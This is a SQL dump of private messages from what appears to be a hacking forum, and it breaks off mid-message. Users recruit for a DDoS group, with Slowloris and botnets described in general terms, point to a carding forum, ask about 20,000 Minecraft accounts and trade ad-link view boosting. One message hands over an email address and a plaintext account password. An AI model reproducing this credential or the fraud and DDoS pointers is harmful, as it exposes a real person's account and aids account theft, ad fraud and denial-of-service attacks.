'[quote=\'R?????zo?\']\r\n[quote=\'VirtualLegend\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'VirtualLegend\']\r\nYou want to join my group\r\n[/quote]\r\n\r\nI\'d love to bro.\r\n[/quote]\r\n\r\nhttp://l33thacking.net/thread-1094-post-6348.html#pid6348\r\nTo Apply, I will then accept you bro\r\n[/quote]\r\n\r\napplied, hope its good enough :3\r\n[/quote]\r\n\r\nWelcome to the group buddy', '1351169297', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3812', '62', '62', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: hi', '0', '[quote=\'R?????zo?\']\r\n[quote=\'sbhshroy2\']\r\nhi frnd \r\ncan u tell me some forums name where i post premium acount with adf.ly or adfoc.us link.\r\n\r\nplease tell me if u know about such forum.\r\n[/quote]\r\n\r\nABH - http://alboraaq.com/\r\n\r\n\r\nwill get you alot of clicks, but it\'s kinda a blackhat/carding forum\r\n[/quote]\r\n\r\n\r\nthanks', '1351170636', '0', '1', '0', '0', '0', '2', '1351171750'); INSERT INTO mybb_privatemessages VALUES('3813', '255', '62', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: hi', '0', '[quote=\'R?????zo?\']\r\n[quote=\'sbhshroy2\']\r\nhi frnd \r\ncan u tell me some forums name where i post premium acount with adf.ly or adfoc.us link.\r\n\r\nplease tell me if u know about such forum.\r\n[/quote]\r\n\r\nABH - http://alboraaq.com/\r\n\r\n\r\nwill get you alot of clicks, but it\'s kinda a blackhat/carding forum\r\n[/quote]\r\n\r\n\r\nthanks', '1351170636', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3814', '160', '160', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '1', 'Minecraft Accounts', '0', 'Heyo, I was wondering where you got those 20,000 minecraft accounts. I know it was from a forum but could you link me?', '1351189989', '0', '3', '1351209043', '1', '0', '2', '1351209016'); INSERT INTO mybb_privatemessages VALUES('3815', '100', '160', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '2', 'Minecraft Accounts', '0', 'Heyo, I was wondering where you got those 20,000 minecraft accounts. I know it was from a forum but could you link me?', '1351189989', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3817', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'rewards', '0', 'hi. All awards reset? even donated to a mod for one D:', '1351202017', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3818', '100', '100', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Re: Minecraft Accounts', '0', '[quote=\'??zg???g????61\']\r\nHeyo, I was wondering where you got those 20,000 minecraft accounts. I know it was from a forum but could you link me?\r\n[/quote]\r\n\r\nNodusGriefing.com', '1351209043', '0', '1', '0', '0', '0', '0', '1351248599'); INSERT INTO mybb_privatemessages VALUES('3819', '160', '100', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: Minecraft Accounts', '0', '[quote=\'??zg???g????61\']\r\nHeyo, I was wondering where you got those 20,000 minecraft accounts. I know it was from a forum but could you link me?\r\n[/quote]\r\n\r\nNodusGriefing.com', '1351209043', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3822', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: rewards', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nhi. All awards reset? even donated to a mod for one D:\r\n[/quote]\r\n\r\nYes all have been reset. I remember your donation award, I will think of something. Also, I\'m sure you had more awards do you remember what they were?\r\n[/quote]\r\n\r\nah okay. \r\nI remember i had:\r\nSwag\r\nDangerous Programmar\r\nDiamond \r\nGenius (Java)\r\n\r\nI remember i had all of these, and some more, but i dont remember what more.', '1351253718', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3823', '2', '2', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'hey ', '0', 'hey man whats happening me and you havent talked much so yeah \r\nwhats happening', '1351306183', '0', '3', '1351306887', '1', '0', '2', '1351306850'); INSERT INTO mybb_privatemessages VALUES('3824', '257', '2', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'hey ', '0', 'hey man whats happening me and you havent talked much so yeah \r\nwhats happening', '1351306183', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3825', '257', '257', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey ', '0', '[quote=\'XxTREYZxX\']\r\nhey man whats happening me and you havent talked much so yeah \r\nwhats happening\r\n[/quote]\r\nNm exhausted from life. Going to bed soon you?', '1351306887', '0', '3', '1351307219', '0', '0', '2', '1351307176'); INSERT INTO mybb_privatemessages VALUES('3826', '2', '257', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey ', '0', '[quote=\'XxTREYZxX\']\r\nhey man whats happening me and you havent talked much so yeah \r\nwhats happening\r\n[/quote]\r\nNm exhausted from life. Going to bed soon you?', '1351306887', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3827', '2', '2', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: hey ', '0', '[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\nhey man whats happening me and you havent talked much so yeah \r\nwhats happening\r\n[/quote]\r\nNm exhausted from life. Going to bed soon you?\r\n[/quote]\r\n\r\nHome alone.\r\nand eating food aahha ', '1351307219', '0', '3', '1351308545', '1', '0', '2', '1351308530'); INSERT INTO mybb_privatemessages VALUES('3828', '257', '2', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Re: hey ', '0', '[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\nhey man whats happening me and you havent talked much so yeah \r\nwhats happening\r\n[/quote]\r\nNm exhausted from life. Going to bed soon you?\r\n[/quote]\r\n\r\nHome alone.\r\nand eating food aahha ', '1351307219', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3829', '257', '257', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey ', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\nhey man whats happening me and you havent talked much so yeah \r\nwhats happening\r\n[/quote]\r\nNm exhausted from life. Going to bed soon you?\r\n[/quote]\r\n\r\nHome alone.\r\nand eating food aahha \r\n[/quote]\r\nNice :P What type?', '1351308545', '0', '3', '1351308933', '0', '0', '2', '1351308905'); INSERT INTO mybb_privatemessages VALUES('3830', '2', '257', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey ', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\nhey man whats happening me and you havent talked much so yeah \r\nwhats happening\r\n[/quote]\r\nNm exhausted from life. Going to bed soon you?\r\n[/quote]\r\n\r\nHome alone.\r\nand eating food aahha \r\n[/quote]\r\nNice :P What type?', '1351308545', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3831', '2', '2', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: hey ', '0', '[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\nhey man whats happening me and you havent talked much so yeah \r\nwhats happening\r\n[/quote]\r\nNm exhausted from life. Going to bed soon you?\r\n[/quote]\r\n\r\nHome alone.\r\nand eating food aahha \r\n[/quote]\r\nNice :P What type?\r\n[/quote]\r\n\r\nThose Sakata things :P', '1351308933', '0', '3', '1351387644', '1', '0', '2', '1351387620'); INSERT INTO mybb_privatemessages VALUES('3832', '257', '2', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Re: hey ', '0', '[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\nhey man whats happening me and you havent talked much so yeah \r\nwhats happening\r\n[/quote]\r\nNm exhausted from life. Going to bed soon you?\r\n[/quote]\r\n\r\nHome alone.\r\nand eating food aahha \r\n[/quote]\r\nNice :P What type?\r\n[/quote]\r\n\r\nThose Sakata things :P', '1351308933', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3834', '294', '294', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"294\";}}', '1', 'hey ', '0', 'hey mate where are you from and who referred you :P', '1351309307', '0', '0', '0', '1', '0', '1', '0'); INSERT INTO mybb_privatemessages VALUES('3835', '257', '294', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"294\";}}', '2', 'hey ', '0', 'hey mate where are you from and who referred you :P', '1351309307', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3837', '100', '100', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Ddosers', '0', 'Hello\r\n\r\nCan I join your group? I think I will be able to answer the questions.\r\n\r\nThanks\r\n', '1351329608', '0', '3', '1351399270', '1', '0', '2', '1351399185'); INSERT INTO mybb_privatemessages VALUES('3838', '53', '100', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Ddosers', '0', 'Hello\r\n\r\nCan I join your group? I think I will be able to answer the questions.\r\n\r\nThanks\r\n', '1351329608', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3861', '228', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Reply fast', '0', '[quote=\'VirtualLegend\']\r\nI\'m working on your thread but there is one mistake \r\n\r\nHow much can you make with 10k views ?\r\n[/quote]\r\n30 dollars', '1351454565', '0', '3', '1351526613', '1', '0', '2', '1351526186'); INSERT INTO mybb_privatemessages VALUES('3841', '53', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Adfocus', '0', 'Hi sirchamp,\r\n\r\nIt looks like a good bussines for you, but the layout isn\'t that great if you want i could make a HQ thread for you with photoshop, but it will take some time cuz I\'m busy atm.', '1351367310', '0', '3', '1351370044', '1', '0', '2', '1351369987'); INSERT INTO mybb_privatemessages VALUES('3842', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Adfocus', '0', 'Hi sirchamp,\r\n\r\nIt looks like a good bussines for you, but the layout isn\'t that great if you want i could make a HQ thread for you with photoshop, but it will take some time cuz I\'m busy atm.', '1351367310', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3843', '82', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Adfoc.us views', '0', 'Hello\r\n\r\nI can boost your adfoc.us. For free! But you have to leave a vouch in the thread. Thanks. Send me your adfoc.us account details. I need the account details to see how much views you have and how much there are to go. I wont change any details. The only thing I will do is perhaps shrink a few more links so I can do the method faster. Send me the details over skype. thanks', '1351369919', '0', '3', '1351370790', '1', '0', '2', '1351370273'); INSERT INTO mybb_privatemessages VALUES('3844', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Adfoc.us views', '0', 'Hello\r\n\r\nI can boost your adfoc.us. For free! But you have to leave a vouch in the thread. Thanks. Send me your adfoc.us account details. I need the account details to see how much views you have and how much there are to go. I wont change any details. The only thing I will do is perhaps shrink a few more links so I can do the method faster. Send me the details over skype. thanks', '1351369919', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3845', '228', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Adfocus', '0', '[quote=\'VirtualLegend\']\r\nHi sirchamp,\r\n\r\nIt looks like a good bussines for you, but the layout isn\'t that great if you want i could make a HQ thread for you with photoshop, but it will take some time cuz I\'m busy atm.\r\n[/quote]\r\nIf you would that Id be very thankful. I can even give you 5k views for free if you want. thats like 15 dollars^^\r\nThanks', '1351370044', '0', '1', '0', '1', '0', '2', '1351370282'); INSERT INTO mybb_privatemessages VALUES('3846', '53', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Adfocus', '0', '[quote=\'VirtualLegend\']\r\nHi sirchamp,\r\n\r\nIt looks like a good bussines for you, but the layout isn\'t that great if you want i could make a HQ thread for you with photoshop, but it will take some time cuz I\'m busy atm.\r\n[/quote]\r\nIf you would that Id be very thankful. I can even give you 5k views for free if you want. thats like 15 dollars^^\r\nThanks', '1351370044', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3847', '53', '53', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: Adfoc.us views', '0', '[quote=\'sirchamp\']\r\nHello\r\n\r\nI can boost your adfoc.us. For free! But you have to leave a vouch in the thread. Thanks. Send me your adfoc.us account details. I need the account details to see how much views you have and how much there are to go. I wont change any details. The only thing I will do is perhaps shrink a few more links so I can do the method faster. Send me the details over skype. thanks\r\n[/quote]\r\nAdfoc.us Info\r\n\r\nLogin\r\nEmail: iTzIpod@hotmail.com\r\nPassword: Moneymaking', '1351370790', '0', '1', '0', '1', '0', '2', '1351372790'); INSERT INTO mybb_privatemessages VALUES('3848', '82', '53', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Adfoc.us views', '0', '[quote=\'sirchamp\']\r\nHello\r\n\r\nI can boost your adfoc.us. For free! But you have to leave a vouch in the thread. Thanks. Send me your adfoc.us account details. I need the account details to see how much views you have and how much there are to go. I wont change any details. The only thing I will do is perhaps shrink a few more links so I can do the method faster. Send me the details over skype. thanks\r\n[/quote]\r\nAdfoc.us Info\r\n\r\nLogin\r\nEmail: iTzIpod@hotmail.com\r\nPassword: Moneymaking', '1351370790', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3849', '257', '257', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey ', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\nhey man whats happening me and you havent talked much so yeah \r\nwhats happening\r\n[/quote]\r\nNm exhausted from life. Going to bed soon you?\r\n[/quote]\r\n\r\nHome alone.\r\nand eating food aahha \r\n[/quote]\r\nNice :P What type?\r\n[/quote]\r\n\r\nThose Sakata things :P\r\n[/quote]\r\nNever heard of it.', '1351387644', '0', '1', '0', '0', '0', '2', '1351495367'); INSERT INTO mybb_privatemessages VALUES('3850', '2', '257', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey ', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'Apathy\']\r\n[quote=\'XxTREYZxX\']\r\nhey man whats happening me and you havent talked much so yeah \r\nwhats happening\r\n[/quote]\r\nNm exhausted from life. Going to bed soon you?\r\n[/quote]\r\n\r\nHome alone.\r\nand eating food aahha \r\n[/quote]\r\nNice :P What type?\r\n[/quote]\r\n\r\nThose Sakata things :P\r\n[/quote]\r\nNever heard of it.', '1351387644', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3851', '53', '53', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: Ddosers', '0', '[quote=\'sirchamp\']\r\nHello\r\n\r\nCan I join your group? I think I will be able to answer the questions.\r\n\r\nThanks\r\n\r\n[/quote]\r\n\r\nQuestions are:\r\n\r\n1.) How long have you been doing networking?\r\n\r\n2.) Whats a botnet? (noob proofing)\r\n\r\n3.) How does the DDoS meathod \'Slowloris\' Work?', '1351399270', '0', '3', '1351410530', '1', '0', '2', '1351409856'); INSERT INTO mybb_privatemessages VALUES('3852', '100', '53', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Ddosers', '0', '[quote=\'sirchamp\']\r\nHello\r\n\r\nCan I join your group? I think I will be able to answer the questions.\r\n\r\nThanks\r\n\r\n[/quote]\r\n\r\nQuestions are:\r\n\r\n1.) How long have you been doing networking?\r\n\r\n2.) Whats a botnet? (noob proofing)\r\n\r\n3.) How does the DDoS meathod \'Slowloris\' Work?', '1351399270', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3853', '100', '100', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Re: Ddosers', '0', '[quote=\'??zg???g????61\']\r\n[quote=\'sirchamp\']\r\nHello\r\n\r\nCan I join your group? I think I will be able to answer the questions.\r\n\r\nThanks\r\n\r\n[/quote]\r\n\r\nQuestions are:\r\n\r\n1.) How long have you been doing networking?\r\n\r\n2.) Whats a botnet? (noob proofing)\r\n\r\n3.) How does the DDoS meathod \'Slowloris\' Work?\r\n[/quote]\r\n1. About a year. \r\n\r\n2. A botnet is like a group of computers that you can use to attack connections. To get computers to your botnet you need to give them your virus file.\r\n\r\n3. With slowloris you can take a website down with using very little bandwith. Slowloris keeps as many connections to the server open and holds them open as long as possible.\r\n\r\nI hope it\'s understandable. I have problems expressing myself in english. It\'s my second language :(', '1351410530', '0', '3', '1351434608', '1', '0', '2', '1351434575'); INSERT INTO mybb_privatemessages VALUES('3854', '53', '100', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: Ddosers', '0', '[quote=\'??zg???g????61\']\r\n[quote=\'sirchamp\']\r\nHello\r\n\r\nCan I join your group? I think I will be able to answer the questions.\r\n\r\nThanks\r\n\r\n[/quote]\r\n\r\nQuestions are:\r\n\r\n1.) How long have you been doing networking?\r\n\r\n2.) Whats a botnet? (noob proofing)\r\n\r\n3.) How does the DDoS meathod \'Slowloris\' Work?\r\n[/quote]\r\n1. About a year. \r\n\r\n2. A botnet is like a group of computers that you can use to attack connections. To get computers to your botnet you need to give them your virus file.\r\n\r\n3. With slowloris you can take a website down with using very little bandwith. Slowloris keeps as many connections to the server open and holds them open as long as possible.\r\n\r\nI hope it\'s understandable. I have problems expressing myself in english. It\'s my second language :(', '1351410530', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3855', '53', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Reply fast', '0', 'I\'m working on your thread but there is one mistake \r\n\r\nHow much can you make with 10k views ?', '1351426255', '0', '3', '1351454565', '1', '0', '2', '1351454435'); INSERT INTO mybb_privatemessages VALUES('3856', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Reply fast', '0', 'I\'m working on your thread but there is one mistake \r\n\r\nHow much can you make with 10k views ?', '1351426255', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3857', '53', '53', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: Ddosers', '0', '[quote=\'sirchamp\']\r\n[quote=\'??zg???g????61\']\r\n[quote=\'sirchamp\']\r\nHello\r\n\r\nCan I join your group? I think I will be able to answer the questions.\r\n\r\nThanks\r\n\r\n[/quote]\r\n\r\nQuestions are:\r\n\r\n1.) How long have you been doing networking?\r\n\r\n2.) Whats a botnet? (noob proofing)\r\n\r\n3.) How does the DDoS meathod \'Slowloris\' Work?\r\n[/quote]\r\n1. About a year. \r\n\r\n2. A botnet is like a group of computers that you can use to attack connections. To get computers to your botnet you need to give them your virus file.\r\n\r\n3. With slowloris you can take a website down with using very little bandwith. Slowloris keeps as many connections to the server open and holds them open as long as possible.\r\n\r\nI hope it\'s understandable. I have problems expressing myself in english. It\'s my second language :(\r\n[/quote]\r\n\r\nAwesome, your in. :D welcome.', '1351434608', '0', '1', '0', '1', '0', '2', '1351454567'); INSERT INTO mybb_privatemessages VALUES('3858', '100', '53', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Ddosers', '0', '[quote=\'sirchamp\']\r\n[quote=\'??zg???g????61\']\r\n[quote=\'sirchamp\']\r\nHello\r\n\r\nCan I join your group? I think I will be able to answer the questions.\r\n\r\nThanks\r\n\r\n[/quote]\r\n\r\nQuestions are:\r\n\r\n1.) How long have you been doing networking?\r\n\r\n2.) Whats a botnet? (noob proofing)\r\n\r\n3.) How does the DDoS meathod \'Slowloris\' Work?\r\n[/quote]\r\n1. About a year. \r\n\r\n2. A botnet is like a group of computers that you can use to attack connections. To get computers to your botnet you need to give them your virus file.\r\n\r\n3. With slowloris you can take a website down with using very little bandwith. Slowloris keeps as many connections to the server open and holds them open as long as possible.\r\n\r\nI hope it\'s understandable. I have problems expressing myself in english. It\'s my second language :(\r\n[/quote]\r\n\r\nAwesome, your in. :D welcome.', '1351434608', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3859', '2', '2', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Hi', '0', 'Why don\'t you become a member of Marketers?', '1351444458', '0', '3', '1351471851', '1', '0', '2', '1351471825'); INSERT INTO mybb_privatemessages VALUES('3860', '228', '2', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Hi', '0', 'Why don\'t you become a member of Marketers?', '1351444458', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3862', '53', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Reply fast', '0', '[quote=\'VirtualLegend\']\r\nI\'m working on your thread but there is one mistake \r\n\r\nHow much can you make with 10k views ?\r\n[/quote]\r\n30 dollars', '1351454565', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3863', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '1', 'Hi', '0', 'Hi, I have noticed that you are starting to become active again on L33T Hacking. Do you want to become a member of coders again and if possible leader?', '1351465198', '0', '3', '1351466215', '1', '0', '0', '1351466054'); INSERT INTO mybb_privatemessages VALUES('3865', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\']\r\nHi, I have noticed that you are starting to become active again on L33T Hacking. Do you want to become a member of coders again and if possible leader?\r\n[/quote]\r\n\r\nHey. Yea i will be more active now, as i have nothing to do after school etc. I will gladely be a member of coders, but not a leader right now. I will be happy if i can become a Co of coders (or something) in the future. :) :cool:', '1351466215', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3866', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '1', 'Re: Hi', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nHi, I have noticed that you are starting to become active again on L33T Hacking. Do you want to become a member of coders again and if possible leader?\r\n[/quote]\r\n\r\nHey. Yea i will be more active now, as i have nothing to do after school etc. I will gladely be a member of coders, but not a leader right now. I will be happy if i can become a Co of coders (or something) in the future. :) :cool:\r\n[/quote]\r\n\r\nThat\'s great news. I will promote you within a hour.', '1351469376', '0', '1', '0', '1', '0', '0', '1351505942'); INSERT INTO mybb_privatemessages VALUES('3867', '228', '228', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Hi', '0', '[quote=\'VirtualLegend\']\r\nWhy don\'t you become a member of Marketers?\r\n[/quote]\r\nI may but I am quite busy at the moment. :P Possibly soon though.', '1351471851', '0', '1', '0', '0', '0', '2', '1351526168'); INSERT INTO mybb_privatemessages VALUES('3868', '2', '228', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hi', '0', '[quote=\'VirtualLegend\']\r\nWhy don\'t you become a member of Marketers?\r\n[/quote]\r\nI may but I am quite busy at the moment. :P Possibly soon though.', '1351471851', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3869', '53', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: Reply fast', '0', 'What do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url]\r\n', '1351526613', '0', '3', '1351526929', '1', '0', '2', '1351526864'); INSERT INTO mybb_privatemessages VALUES('3870', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Reply fast', '0', 'What do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url]\r\n', '1351526613', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3871', '228', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Reply fast', '0', '[quote=\'VirtualLegend\']\r\nWhat do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url]\r\n\r\n[/quote]\r\nThanks sooo muuch <33 you. So nice. :D \r\ni FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^\r\nThanks a million.', '1351526929', '0', '3', '1351530760', '1', '0', '2', '1351530188'); INSERT INTO mybb_privatemessages VALUES('3872', '53', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Reply fast', '0', '[quote=\'VirtualLegend\']\r\nWhat do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url]\r\n\r\n[/quote]\r\nThanks sooo muuch <33 you. So nice. :D \r\ni FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^\r\nThanks a million.', '1351526929', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3874', '53', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: Reply fast', '0', '[quote=\'sirchamp\']\r\n[quote=\'VirtualLegend\']\r\nWhat do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url]\r\n\r\n[/quote]\r\nThanks sooo muuch <33 you. So nice. :D \r\ni FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^\r\nThanks a million.\r\n[/quote]\r\n\r\nI\'m really glad that you love it\r\nThanks bro\r\n\r\nWhat should i give to you to boost my adfoc.us\r\n\r\nLink: http://adfoc.us/938301\r\n\r\nIf you need help with anything just contact me ', '1351530760', '0', '3', '1351531004', '1', '0', '2', '1351530929'); INSERT INTO mybb_privatemessages VALUES('3875', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Reply fast', '0', '[quote=\'sirchamp\']\r\n[quote=\'VirtualLegend\']\r\nWhat do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url]\r\n\r\n[/quote]\r\nThanks sooo muuch <33 you. So nice. :D \r\ni FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^\r\nThanks a million.\r\n[/quote]\r\n\r\nI\'m really glad that you love it\r\nThanks bro\r\n\r\nWhat should i give to you to boost my adfoc.us\r\n\r\nLink: http://adfoc.us/938301\r\n\r\nIf you need help with anything just contact me ', '1351530760', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3876', '228', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Reply fast', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'sirchamp\']\r\n[quote=\'VirtualLegend\']\r\nWhat do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url]\r\n\r\n[/quote]\r\nThanks sooo muuch <33 you. So nice. :D \r\ni FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^\r\nThanks a million.\r\n[/quote]\r\n\r\nI\'m really glad that you love it\r\nThanks bro\r\n\r\nWhat should i give to you to boost my adfoc.us\r\n\r\nLink: http://adfoc.us/938301\r\n\r\nIf you need help with anything just contact me \r\n[/quote]\r\nI need your adfoc,us login infos. You can change it to something simple. I need the access to make more links. I wont change anything', '1351531004', '0', '3', '1351531131', '1', '0', '2', '1351531029'); INSERT INTO mybb_privatemessages VALUES('3877', '53', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Reply fast', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'sirchamp\']\r\n[quote=\'VirtualLegend\']\r\nWhat do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url]\r\n\r\n[/quote]\r\nThanks sooo muuch <33 you. So nice. :D \r\ni FUCKING LOVE YOU. Tell me if 